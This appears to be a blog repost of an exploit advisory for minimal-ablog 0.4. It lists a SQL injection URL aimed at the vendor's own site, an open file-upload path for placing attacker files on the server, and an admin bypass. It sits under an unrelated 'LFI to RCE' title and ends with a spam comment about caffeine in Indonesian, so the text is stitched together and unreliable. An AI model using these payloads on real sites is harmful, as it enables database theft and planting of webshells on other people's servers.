LFI to RCE via access_log injection

minimal-ablog 0.4 - Multiple Vuln

[o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln

Software : minimal-ablog version 0.4
Vendor : http://www.abweb.co.cc/
Download : http://code.google.com/p/minimal-ablog/downloads/list
Author : NoGe

[o] Vulnerable file

[o] Exploit
[ SQL Injection ]
http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8-- <=- demo

[ File Upload ]
htp://localhost/[path]/admin/uploader.php <=- upload your file here http://localhost/[path]/img/[your_file] <=- file will be uploaded here

[ Admin Bypass ]
when you open http://localhost/[path]/admin/uploader.php to upload file you already have admin privs too :)


labatterie said…
The belum ada penelitian ilmiah yang menyatakan konsumsi kafein dalam taraf normal dapat membahayakan kesehatan.